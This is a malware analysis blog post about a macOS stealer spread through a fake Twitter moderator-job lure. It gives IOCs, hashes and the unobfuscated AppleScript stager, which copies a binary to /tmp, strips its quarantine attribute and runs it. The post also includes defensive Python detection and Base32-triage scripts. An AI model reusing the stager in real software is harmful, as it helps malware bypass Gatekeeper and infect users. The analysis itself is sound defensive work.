A new account shot me a DM on Twitter with some malware, so I figured "why not?". Of course the standard procedure applies:

- Do you want a job as an admin / moderator? Pays $500 a week!
- Sends a malicious link.
- Part of the requirement is creating an account through the software after you download it.

Aaaaand of course it's just straight-up malware that steals everything. EZPZ.

Let's jump into it.
Info
| Item | Value |
| --- | --- |
| URL | https[://]runeonline[.]games |
| URLScan.io | https://urlscan.io/result/cf8cb6ac-7428-4a21-b182-292e6fcd4a43/ |
| URL VT | https://www.virustotal.com/gui/url/7872392c2d96ce74deef786437a1118e4f2e1780f7988ea7d38c7a47ff6b6c68 |
| Downloaded File Name | RuneLauncher_v.2.5.dmg |
| Downloaded File Hash | 3f5b9f5940173e9fb46b2eff36c9805dc68652ede49c29a6efafaccc540e2a15 |
| VT (4/62) | |
| DMG File 1 | RuneLauncher |
| File 1 Hash | e44228575afdd57630f1ce960d7843ff1052ecea46b9d66ba6d6fdfd83c45511 |
| File 1 VT (6/64) | https://www.virustotal.com/gui/file/e44228575afdd57630f1ce960d7843ff1052ecea46b9d66ba6d6fdfd83c45511 |
| DMG File 2 | instruction.txt |
| File 2 Hash | 71421867fcd32ac92545f4a623543cf077838791691a4323347235493aa41767 |
| File 2 VT (0/61) | https://www.virustotal.com/gui/file/71421867fcd32ac92545f4a623543cf077838791691a4323347235493aa41767 |
| DMG File 3 | An alias to the Terminal application. |
First Look
I mounted the "RuneLauncher_v.2.5.dmg" file using:

```shell
hdiutil attach RuneLauncher_v.2.5.dmg
```

and it contained the three files shown above:

- instruction.txt (Plain Text)
- RuneLauncher (Unix Executable)
- Terminal (Alias)
What's inside instruction.txt? Well, I bet you already guessed it; more AppleScript 🎉! And it's not even obfuscated 🙃.
```bash
#!/bin/bash
osascript -e 'on run
    -- Enumerate mounted volumes and find the one this DMG was mounted as
    try
        set volumeList to list disks
    end try
    set setupVolume to ""
    try
        repeat with vol in volumeList
            if vol contains "RuneLauncher" then
                set setupVolume to vol
                exit repeat
            end if
        end repeat
    end try
    if setupVolume is "" then
        return
    end if
    -- Build the path of the binary on the DMG and of a copy under /tmp
    set scriptDir to "/Volumes/" & setupVolume & "/"
    set executableName to "RuneLauncher"
    set executablePath to scriptDir & executableName
    set tmpExecutablePath to "/tmp/" & executableName
    try
        do shell script "rm -f " & quoted form of tmpExecutablePath
    end try
    try
        do shell script "cp " & quoted form of executablePath & " " & quoted form of tmpExecutablePath
    end try
    -- Strip every extended attribute from the copy, including the com.apple.quarantine flag it inherited, so Gatekeeper does not get in the way
    try
        do shell script "xattr -c " & quoted form of tmpExecutablePath
    end try
    try
        do shell script "chmod +x " & quoted form of tmpExecutablePath
    end try
    -- Finally, run the copied binary
    try
        do shell script quoted form of tmpExecutablePath
    end try
end run'
```
So instead of the AppleScript performing the malicious actions right off the bat, it's used purely as a stager: copy RuneLauncher to /tmp, strip the quarantine attribute, make it executable and run it. Neat! What's inside of RuneLauncher? It is (of course) ad hoc signed.
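As an added example (not code from the original post), here is a small Python triage script for this dropper pattern: it flags the indicators the instruction.txt above relies on (inline osascript, `do shell script`, volume enumeration, a /tmp path, `xattr -c` / quarantine removal, `chmod +x`) and applies the rule of thumb from the end of this write-up to a DMG listing. The indicator names, the benign README and the listing are constructed for the demo; the malicious sample is an excerpt of the script quoted above.

```python
"""Static triage for the dropper pattern in this sample's instruction.txt.

Added example (not code from the original post): it scans a text file for the
AppleScript/shell indicators the RuneLauncher script uses, and checks a DMG
listing for the rule of thumb "a .txt beside a bare Unix executable and a
Terminal alias". MALICIOUS_INSTRUCTION is an excerpt of the script quoted in
the post; BENIGN_README and SAMPLE_LISTING are constructed for the demo.
"""
import re
from typing import Dict, List, Tuple

# Indicator name -> regex; each one corresponds to a step of the quoted script.
INDICATORS: Dict[str, re.Pattern] = {
    "osascript_inline":   re.compile(r"\bosascript\s+-e\b"),
    "do_shell_script":    re.compile(r"\bdo shell script\b"),
    "volume_enumeration": re.compile(r"\blist disks\b"),
    "tmp_path":           re.compile(r"/tmp/"),
    "xattr_strip":        re.compile(r"\bxattr\s+(?:-c\b|-d\s+com\.apple\.quarantine)"),
    "chmod_exec":         re.compile(r"\bchmod\s+\+x\b"),
}


def scan_instruction_text(text: str) -> List[str]:
    """Return the names of every indicator present in the text, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def classify(found: List[str]) -> str:
    """Verdict for a text file the victim is meant to read.

    A "readme" that strips extended attributes and marks a file executable is
    a dropper no matter what the surrounding instructions say.
    """
    if "xattr_strip" in found and "chmod_exec" in found:
        return "dropper"
    if "do_shell_script" in found or "osascript_inline" in found:
        return "suspicious"
    return "clean"


def triage_dmg_listing(entries: List[Tuple[str, str]]) -> List[str]:
    """Flags for a DMG listing given as (file name, Finder kind) pairs."""
    names = {name.lower() for name, _ in entries}
    kinds = {kind.lower() for _, kind in entries}
    flags: List[str] = []
    if "alias" in kinds and "terminal" in names:
        flags.append("terminal_alias")          # a Terminal alias shipped inside a DMG
    if "unix executable" in kinds and not any(n.endswith(".app") for n in names):
        flags.append("bare_executable_no_app")  # a loose Mach-O instead of an app bundle
    if any(n.endswith(".txt") for n in names) and "unix executable" in kinds:
        flags.append("txt_beside_executable")   # the "instructions" may be the loader
    return flags


# Excerpt of the instruction.txt quoted in the post.
MALICIOUS_INSTRUCTION = """#!/bin/bash
osascript -e 'on run
try
set volumeList to list disks
end try
set tmpExecutablePath to "/tmp/" & executableName
try
do shell script "xattr -c " & quoted form of tmpExecutablePath
end try
try
do shell script "chmod +x " & quoted form of tmpExecutablePath
end try
try
do shell script quoted form of tmpExecutablePath
end try
end run'
"""

# Constructed benign counterpart: plain installation notes, no scripting.
BENIGN_README = "Drag RuneLauncher to your Applications folder and open it from Launchpad.\n"

# Constructed listing mirroring the three items the post found on the DMG.
SAMPLE_LISTING = [
    ("instruction.txt", "Plain Text"),
    ("RuneLauncher", "Unix Executable"),
    ("Terminal", "Alias"),
]

if __name__ == "__main__":
    found = scan_instruction_text(MALICIOUS_INSTRUCTION)
    print("indicators:", found, "->", classify(found))
    print("benign readme:", classify(scan_instruction_text(BENIGN_README)))
    print("dmg flags:", triage_dmg_listing(SAMPLE_LISTING))
```

The regexes are deliberately loose (any `xattr -c`, any `chmod +x`) because the verdict only fires on the combination, and that combination has no business in a file called instruction.txt.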
Running the following command, I extract it to grab the binaries:

```shell
7z x RuneLauncher
```

Running it again, I extract it to separate the interior files:

```shell
7z x RuneLauncher~.x64
```
And now I'm left with this:
At this point, it's time to see how messed up the internals of these files are and whether it'd be easier to approach the sample dynamically or statically. For this, I'm now using a tool called "Hex Fiend" instead of Sublime.
Inside of it is little else other than giant blobs of encoded/encrypted data. It looks like everything may be Base32-encoded on the surface, then potentially some specific strings are used to decrypt it, as just Base32 decoding doesn't give any information up. I (still) haven't had time to set up my dynamic analysis environment, which also means I don't have time to walk through this with Binary Ninja and pull values (sadly). But this thing, for sure, is malicious, so stay safe out there! Anything with a Terminal alias inside of it and AppleScript inside a .txt file can't be trusted. 😂
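An added example, not from the post, of how to check the "Base32 on the surface" hypothesis without a disassembler: pull every Base32-alphabet run out of a strings dump, decode it, and look at the entropy and printable ratio of what comes out. Readable text that was merely Base32-encoded decodes to mostly printable, low-entropy bytes; data with another layer underneath stays near 8 bits/byte, which is exactly the "decoding gives nothing up" situation. The two blobs are constructed (a readable string and seeded pseudo-random bytes standing in for ciphertext), since the sample's own data is not on this page.

```python
"""Decode Base32-looking blobs and measure what comes out.

Added example, not from the post: finds runs of the RFC 4648 Base32 alphabet in
extracted text, decodes them, and reports Shannon entropy and printable ratio of
the decoded bytes. Both sample blobs below are constructed: one wraps a readable
string, the other wraps deterministic pseudo-random bytes standing in for
ciphertext.
"""
import base64
import math
import random
import re
from collections import Counter
from typing import Dict, List, Optional

# Runs of at least 16 Base32 characters, with optional '=' padding.
BASE32_RUN = re.compile(r"[A-Z2-7]{16,}={0,6}")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0 for a constant string, close to 8 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or common whitespace."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def decode_base32_run(run: str) -> Optional[bytes]:
    """Decode one run, restoring '=' padding that extraction may have trimmed."""
    padded = run + "=" * (-len(run) % 8)
    try:
        return base64.b32decode(padded)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def triage_blobs(text: str) -> List[Dict[str, object]]:
    """One record per decodable Base32 run found in the text."""
    records: List[Dict[str, object]] = []
    for m in BASE32_RUN.finditer(text):
        raw = decode_base32_run(m.group(0))
        if raw is None:
            continue
        ent, pr = shannon_entropy(raw), printable_ratio(raw)
        if pr > 0.9:
            verdict = "plain text: Base32 was the only layer"
        elif ent > 7.0:
            verdict = "high entropy: another layer (encryption/compression) under the Base32"
        else:
            verdict = "binary or structured data"
        records.append({"offset": m.start(), "decoded_len": len(raw),
                        "entropy": round(ent, 2), "printable": round(pr, 2),
                        "verdict": verdict})
    return records


# Constructed sample 1: a readable string, Base32-encoded.
READABLE_B32 = base64.b32encode(
    b"RuneLauncher config: language=en theme=dark autoupdate=true").decode()
# Constructed sample 2: 4096 deterministic pseudo-random bytes standing in for ciphertext.
_rng = random.Random(20240101)
CIPHERTEXT_LIKE = bytes(_rng.getrandbits(8) for _ in range(4096))
OPAQUE_B32 = base64.b32encode(CIPHERTEXT_LIKE).decode()
# A strings-style dump with both blobs embedded among unrelated lines.
SAMPLE_TEXT = "launcher init\n" + READABLE_B32 + "\nstage\n" + OPAQUE_B32 + "\nend\n"

if __name__ == "__main__":
    for rec in triage_blobs(SAMPLE_TEXT):
        print(rec)
```

Running it on a real dump is just `triage_blobs(open(path).read())`; the records that come back as high entropy are the ones where the Base32 is only wrapping paper and the real key or routine still has to be pulled from the binary.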
I've updated my Web3/Crypto MacOS malware collection on VirusTotal with it, so feel free to check them out if you're interested in more: https://www.virustotal.com/gui/collection/727abc31926dc18e3fb984679954393c10e9383b1a78fea085254d46bd279cc0/iocs